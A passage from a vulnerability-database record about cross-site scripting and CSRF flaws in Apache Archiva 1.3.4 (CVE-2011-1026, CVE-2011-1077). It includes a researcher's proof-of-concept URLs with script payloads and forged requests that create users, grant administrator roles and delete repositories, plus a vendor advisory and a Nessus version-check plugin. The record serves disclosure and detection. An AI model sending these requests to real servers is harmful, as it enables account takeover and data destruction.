\ndisclosure or modification of sensitive data and phishing attacks. \n \n---------------------------------------------------------------------- \n \nProof of Concept: \nReflected XSS: \nhttp://127.0.0.1:8080/archiva/security/useredit.action?username=test%3Cs \ncript%3Ealert%28%27xss%27%29%3C/script%3E \nhttp://127.0.0.1:8080/archiva/security/roleedit.action?name=%22%3E%3Cscr \nipt%3Ealert%28%27xss%27%29%3C%2Fscript%3E \nhttp://127.0.0.1:8080/archiva/security/userlist!show.action?roleName=tes \nt%3Cscript%3Ealert%28%27xss%27%29%3C/script%3E \nhttp://127.0.0.1:8080/archiva/deleteArtifact!doDelete.action?groupId=1<s \ncript>alert('xss')</script>&artifactId=1<script>alert('xss')</script>&ve \nrsion=1&repositoryId=internal \nhttp://127.0.0.1:8080/archiva/admin/addLegacyArtifactPath!commit.action? \nlegacyArtifactPath.path=test%3Cscript%3Ealert%28%27xss%27%29%3C%2Fscript \n%3E&groupId=test%3Cscript%3Ealert%28%27xss%27%29%3C%2Fscript%3E&artifact \nId=test%3Cscript%3Ealert%28%27xss%27%29%3C%2Fscript%3E&version=test%3Csc \nript%3Ealert%28%27xss%27%29%3C%2Fscript%3E&classifier=test%3Cscript%3Eal \nert%28%27xss%27%29%3C%2Fscript%3E&type=test%3Cscript%3Ealert%28%27xss%27 \n%29%3C%2Fscript%3E \nhttp://127.0.0.1:8080/archiva/admin/deleteNetworkProxy!confirm.action?pr \noxyid=test%3Cscript%3Ealert%28%27xss%27%29%3C/script%3E \n \n \nPersistant (Stored) XSS: \nExploit code: test<script>alert('xss')</script> \nhttp://127.0.0.1:8080/archiva/admin/addRepository.action \n(Identifier:repository.id, Name:repository.name, \nDirectory:repository.location, Index Directory:repository.indexDir) \nhttp://127.0.0.1:8080/archiva/admin/confirmDeleteRepository.action?repoi \nd= \n \nhttp://127.0.0.1:8080/archiva/admin/editAppearance.action \n(Name:organisationName, URL:organisation:URL, LogoURL:organisation:URL) \nhttp://127.0.0.1:8080/archiva/admin/configureAppearance.action \n \nhttp://127.0.0.1:8080/archiva/admin/addLegacyArtifactPath.action(Path:na \nme=legacyArtifactPath.path, GroupId:groupId, ArtifactId:artifactId, \nVersion:version, Classifier:classifier, Type:type) \nhttp://127.0.0.1:8080/archiva/admin/legacyArtifactPath.action \n \nhttp://127.0.0.1:8080/archiva/admin/addNetworkProxy.action \n(Identifier:proxy.id, Protocol:proxy.protocol, Hostname:proxy.host, \nPort:proxy.port, Username:proxy.username) \nhttp://127.0.0.1:8080/archiva/admin/networkProxies.action \n--------------------------------------------------------------------- \n \nWarm Regards, \nRiyaz Ahemed Walikar || Senior Engineer - Professional Services \nVulnerability Assessment & Penetration Testing \nMobile: +91-98860-42242 || Extn: 5601 \n \n \n \nThe information transmitted is intended only for the person or entity to which it is addressed and may contain confidential and/or privileged material. \nAny review, re-transmission, dissemination or other use of or taking of any action in reliance upon,this information by persons or entities other than the intended recipient is prohibited. \nIf you received this in error, please contact the sender and delete the material from your computer. \nMicroland takes all reasonable steps to ensure that its electronic communications are free from viruses. \nHowever, given Internet accessibility, the Company cannot accept liability for any virus introduced by this e-mail or any attachment and you are advised to use up-to-date virus checking software. \n \n`\n", "sourceHref": "https://packetstormsecurity.com/files/download/101797/apachearchivapoc-xss.txt", "cvss": {"score": 6.8, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2016-12-05T22:16:37", "bulletinFamily": "exploit", "description": "", "modified": "2011-05-30T00:00:00", "published": "2011-05-30T00:00:00", "href": "https://packetstormsecurity.com/files/101798/Apache-Archiva-1.3.4-Cross-Site-Request-Forgery.html", "id": "PACKETSTORM:101798", "type": "packetstorm", "title": "Apache Archiva 1.3.4 Cross Site Request Forgery", "sourceData": "`Hi, \n \nThis is regarding multiple CSRF (Cross Site Request Forgery) \nVulnerabilities in Apache Archiva 1.3.4 (and previous versions). The \nfollowing is the disclosure document \n \nTitle: Multiple CSRF Vulnerabilities in Apache Archiva 1.3.4 \n-------------------------------------------------------------------- \n \nProject: Apache Archiva \nSeverity: High \nVersions: 1.3.0 - 1.3.4. The unsupported versions Archiva 1.0 - 1.2.2 \nare also affected. \nExploit type: Multiple CSRF \nMitigation: Archiva 1.3.4 and earlier users should upgrade to 1.3.5 \nVendor URL: http://archiva.apache.org/security.html \nCVE: CVE-ID-2011-1026 \n-------------------------------------------------------------------- \n \nTimeline: \n28 February 2011: Vendor Contacted \n1 March 2011: Vendor Response received. CVE-2011-1026 for CSRF Issues \nAssigned. \n7 March 2011: CVE-2011-1077 Assigned for XSS Issues. \n14 March 2011: Fixes released to selected channels / Found to be \ninsufficient \n27 May 2011: Vendor releases v1.3.5 \n27 May 2011: Vendor releases security disclosure to Bugtraq and FD. \n30 May 2011: Exploit details released. \n-------------------------------------------------------------------- \n \nProduct Description: \nApache Archiva is an extensible repository management software that \nhelps taking care of your own personal or enterprise-wide build artifact \nrepository. It is the perfect companion for build tools such as Maven, \nContinuum, and ANT. \n \nArchiva offers several capabilities, amongst which remote repository \nproxying, security access management, build artifact storage, delivery, \nbrowsing, indexing and usage reporting, extensible scanning \nfunctionality... and many more! \n(Source: http://archiva.apache.org/) \n-------------------------------------------------------------------- \n \nVulnerability Details: \nThese issues allow an attacker to access and use the application with \nthe session of a logged on user. In this case if an administrative \naccount is exploited, total application compromise may be acheived. \nAn attacker can build a simple html page containing a hidden Image tag \n(eg: <img src=vulnurl width=0 height=0 />) and entice the administrator \nto access the page. \n--------------------------------------------------------------------- \n \nProof of Concept: \nhttp://127.0.0.1:8080/archiva/security/usercreate!submit.action?user.use \nrname=tester123&user.fullName=test&user.email=test%40test.com&user.passw \nord=abc&user.confirmPassword=abc \nhttp://127.0.0.1:8080/archiva/security/userdelete!submit.action?username \n=test \nhttp://127.0.0.1:8080/archiva/security/addRolesToUser.action?principal=t \nest&addRolesButton=true&__checkbox_addNDSelectedRoles=Guest&__checkbox_a \nddNDSelectedRoles=Registered+User&addNDSelectedRoles=System+Administrato \nr&__checkbox_addNDSelectedRoles=System+Administrator&__checkbox_addNDSel \nectedRoles=User+Administrator&__checkbox_addNDSelectedRoles=Global+Repos \nitory+Manager&__checkbox_addNDSelectedRoles=Global+Repository+Observer&s \nubmitRolesButton=Submit \nhttp://127.0.0.1:8080/archiva/admin/deleteRepository.action?repoid=test& \nmethod%3AdeleteContents=Delete+Configuration+and+Contents \nhttp://127.0.0.1:8080/archiva/deleteArtifact!doDelete.action?groupId=1&a \nrtifactId=1&version=1&repositoryId=snapshots \nhttp://127.0.0.1:8080/archiva/admin/addRepositoryGroup.action?repository \nGroup.id=csrfgrp \nhttp://127.0.0.1:8080/archiva/admin/deleteRepositoryGroup.action?repoGro \nupId=test&method%3Adelete=Confirm \nhttp://127.0.0.1:8080/archiva/admin/disableProxyConnector!disable.action \n?target=maven2-repository.dev.java.net&source=internal \nhttp://127.0.0.1:8080/archiva/admin/deleteProxyConnector!delete.action?t \narget=maven2-repository.dev.java.net&source=snapshots \nhttp://127.0.0.1:8080/archiva/admin/deleteLegacyArtifactPath.action?path \n=jaxen%2Fjars%2Fjaxen-1.0-FCS-full.jar \nhttp://127.0.0.1:8080/archiva/admin/saveNetworkProxy.action?mode=add&pro \nxy.id=ntwrk&proxy.protocol=http&proxy.host=test&proxy.port=8080&proxy.us \nername=&proxy.password= \nhttp://127.0.0.1:8080/archiva/admin/deleteNetworkProxy!delete.action?pro \nxyid=myproxy \nhttp://127.0.0.1:8080/archiva/admin/repositoryScanning!addFiletypePatter \nn.action?pattern=**%2F*.rum&fileTypeId=artifacts \nhttp://127.0.0.1:8080/archiva/admin/repositoryScanning!removeFiletypePat \ntern.action?pattern=**%2F*.rum&fileTypeId=artifacts \nhttp://127.0.0.1:8080/archiva/admin/repositoryScanning!updateKnownConsum \ners.action?enabledKnownContentConsumers=auto-remove&enabledKnownContentC \nonsumers=auto-rename&enabledKnownContentConsumers=create-missing-checksu \nms&enabledKnownContentConsumers=index-content&enabledKnownContentConsume \nrs=metadata-updater&enabledKnownContentConsumers=repository-purge&enable \ndKnownContentConsumers=update-db-artifact&enabledKnownContentConsumers=v \nalidate-checksums \nhttp://127.0.0.1:8080/archiva/admin/database!updateUnprocessedConsumers. \naction?enabledUnprocessedConsumers=update-db-project \nhttp://127.0.0.1:8080/archiva/admin/database!updateCleanupConsumers.acti \non?enabledCleanupConsumers=not-present-remove-db-artifact&enabledCleanup \nConsumers=not-present-remove-db-project&enabledCleanupConsumers=not-pres \nent-remove-indexed \n \nWarm Regards, \nRiyaz Ahemed Walikar || Senior Engineer - Professional Services \nVulnerability Assessment & Penetration Testing \nMobile: +91-98860-42242 || Extn: 5601 \n \n \nThe information transmitted is intended only for the person or entity to which it is addressed and may contain confidential and/or privileged material. \nAny review, re-transmission, dissemination or other use of or taking of any action in reliance upon,this information by persons or entities other than the intended recipient is prohibited. \nIf you received this in error, please contact the sender and delete the material from your computer. \nMicroland takes all reasonable steps to ensure that its electronic communications are free from viruses. \nHowever, given Internet accessibility, the Company cannot accept liability for any virus introduced by this e-mail or any attachment and you are advised to use up-to-date virus checking software. \n \n`\n", "cvss": {"score": 6.8, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "sourceHref": "https://packetstormsecurity.com/files/download/101798/apachearchiva134poc-xsrf.txt"}, {"lastseen": "2016-12-05T22:22:15", "bulletinFamily": "exploit", "description": "", "modified": "2011-05-27T00:00:00", "published": "2011-05-27T00:00:00", "href": "https://packetstormsecurity.com/files/101748/Apache-Archiva-1.3.4-Cross-Site-Request-Forgery.html", "id": "PACKETSTORM:101748", "type": "packetstorm", "title": "Apache Archiva 1.3.4 Cross Site Request Forgery", "sourceData": "`CVE-2011-1026: Apache Archiva Multiple CSRF vulnerability \n \nSeverity: High \n \nVendor: \nThe Apache Software Foundation \n \nVersions Affected: \nArchiva 1.3.0 - 1.3.4 \nThe unsupported versions Archiva 1.0 - 1.2.2 are also affected. \n \nDescription: \nAn attacker can build a simple html page containing a hidden Image tag \n(eg: <img src=vulnurl width=0 height=0 />) and entice the administrator \nto access the page. \nMitigation: \nArchiva 1.3.4 and earlier users should upgrade to 1.3.5 \n \nCredit: \nThis issue was discovered by Riyaz Ahemed Walikar of Microland Ltd., India \n \nReferences: \nhttp://archiva.apache.org/security.html \n \nThanks, \nThe Apache Archiva Team \n`\n", "sourceHref": "https://packetstormsecurity.com/files/download/101748/apachearchiva134-xsrf.txt", "cvss": {"score": 6.8, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}], "nessus": [{"lastseen": "2020-04-01T06:48:53", "bulletinFamily": "scanner", "description": "According to its self-reported version, the instance of Apache\nArchiva hosted on the remote web server is earlier than 1.3.5 and thus\nis affected by multiple persistent and reflective cross-site scripting\nand cross-site request forgery vulnerabilities.\n\nIf an attacker can trick a user of the affected application into\nfollowing a malicious link, this issue could be leveraged to inject\narbitrary HTML or script code into the user", "modified": "2020-04-02T00:00:00", "id": "ARCHIVA_1_3_5.NASL", "href": "https://www.tenable.com/plugins/nessus/54970", "published": "2011-06-05T00:00:00", "title": "Apache Archiva < 1.3.5 Multiple Vulnerabilities", "type": "nessus", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n\n\ninclude(\"compat.inc\");\n\n\nif (description)\n{\n script_id(54970);\n script_version(\"1.9\");\n script_cvs_date(\"Date: 2018/11/15 20:50:16\");\n\n script_cve_id(\"CVE-2011-1026\", \"CVE-2011-1077\");\n script_bugtraq_id(48011, 48015);\n\n script_name(english:\"Apache Archiva < 1.3.5 Multiple Vulnerabilities\");\n script_summary(english:\"Checks Archiva version\");\n\n script_set_attribute(\n attribute:\"synopsis\",\n value:\n\"The remote web server hosts an application that is affected by\nmultiple vulnerabilities.\"\n );\n script_set_attribute(\n attribute:\"description\",\n value:\n\"According to its self-reported version, the instance of Apache\nArchiva hosted on the remote web server is earlier than 1.3.5 and thus\nis affected by multiple persistent and reflective cross-site scripting\nand cross-site request forgery vulnerabilities.\n\nIf an attacker can trick a user of the affected application into\nfollowing a malicious link, this issue could be leveraged to inject\narbitrary HTML or script code into the user's browser to be executed\nwithin the security context of the affected site.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.securityfocus.com/archive/1/518188/30/0/threaded\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.securityfocus.com/archive/1/518189/30/0/threaded\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://archiva.apache.org/security.html\"\n );\n script_set_attribute(\n attribute:\"solution\",\n value:\"Upgrade to Apache Archiva 1.3.5 or later.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:F/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2011/05/30\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2011/06/05\");\n\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:apache:archiva\");\n script_set_attribute(attribute:\"plugin_type\", value:\"remote\");\n script_end_attributes();\n\n script_category(ACT_ATTACK);\n script_family(english:\"CGI abuses\");\n\n script_copyright(english:\"This script is Copyright (C) 2011-2018 Tenable Network Security, Inc.\");\n\n script_dependencies(\"archiva_detect.nasl\");\n script_exclude_keys(\"Settings/disable_cgi_scanning\");\n script_require_keys(\"www/archiva\");\n script_require_ports(\"Services/www\", 8080);\n\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"misc_func.inc\");\ninclude(\"http.inc\");\ninclude(\"webapp_func.inc\");\n\n\nport = get_http_port(default:8080, embedded:FALSE);\n\ninstall = get_install_from_kb(appname:'archiva', port:port, exit_on_fail:TRUE);\ndir = install['dir'];\ninstall_url = build_url(port:port, qs:dir+'/index.action');\n\nversion = install['ver'];\nif (version == UNKNOWN_VER) \n audit(AUDIT_UNKNOWN_WEB_APP_VER, \"Apache Archiva\", install_url);\n\nif (\n version =~ '^1\\\\.[0-2]($|[^0-9])' ||\n version =~ '^1\\\\.3($|[^0-9.])' ||\n version =~ '^1\\\\.3\\\\.[1-4]($|[^0-9])'\n)\n{\n if (report_verbosity > 0)\n {\n report = \n '\\n URL : ' + install_url +\n '\\n Installed version : ' + version +\n '\\n Fixed version : 1.3.5' +\n '\\n';\n security_hole(port:port, extra:report);\n }\n else security_hole(port);\n exit(0);\n}\nelse audit(AUDIT_WEB_APP_NOT_AFFECTED, \"Apache Archiva\", install_url, version);\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "seebug": [{"lastseen": "2017-11-19T18:03:10", "bulletinFamily": "exploit", "description": "Bugtraq ID: 48011\r\nCVE ID\uff1aCVE-2011-1077\r\n\r\nApache Archiva\u662f\u4e00\u6b3e\u7ba1\u7406\u4e00\u4e2a\u548c\u591a\u4e2a\u8fdc\u7a0b\u5b58\u50a8\u7684\u8f6f\u4ef6\u3002\r\nApache Archiva\u5b58\u5728\u591a\u4e2a\u5b58\u50a8\u578b\u548c\u53cd\u5c04\u578b\u8de8\u7ad9\u811a\u672c\u95ee\u9898\uff0c\u5728\u8bf7\u6c42\u53c2\u6570\u4e2d\u6216\u53d1\u9001\u8868\u5355\u4e2d\u63d0\u4ea4\u5305\u542b\u6076\u610f\u4ee3\u7801\u7684JavaScript\uff0c\u8bf1\u4f7f\u7528\u6237\u5904\u7406\u53ef\u5bfc\u81f4\u6076\u610f\u811a\u672c\u5728\u76ee\u6807\u7528\u6237\u6d4f\u89c8\u5668\u4e0a\u6267\u884c\uff0c\u53ef\u83b7\u5f97\u654f\u611f\u4fe1\u606f\u6216\u52ab\u6301\u7528\u6237\u4f1a\u8bdd\n\nApache Archiva 1.3.4\r\n Apache Archiva 1.3.3\r\n Apache Archiva 1.3.2\r\n Apache Archiva 1.3.1\r\n Apache Archiva 1.3\nApache Archiva 1.3.5\u5df2\u7ecf\u4fee\u590d\u6b64\u6f0f\u6d1e\uff0c\u5efa\u8bae\u7528\u6237\u4e0b\u8f7d\u4f7f\u7528\uff1a\r\nhttp://archiva.apache.org/index.html", "modified": "2011-06-02T00:00:00", "published": "2011-06-02T00:00:00", "href": "https://www.seebug.org/vuldb/ssvid-20598", "id": "SSV:20598", "title": "Apache Archiva\u8de8\u7ad9\u811a\u672c\u548cHTML\u6ce8\u5165\u6f0f\u6d1e", "type": "seebug", "sourceData": "", "cvss": {"score": 4.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:NONE/I:PARTIAL/A:NONE/"}, "sourceHref": ""}]}
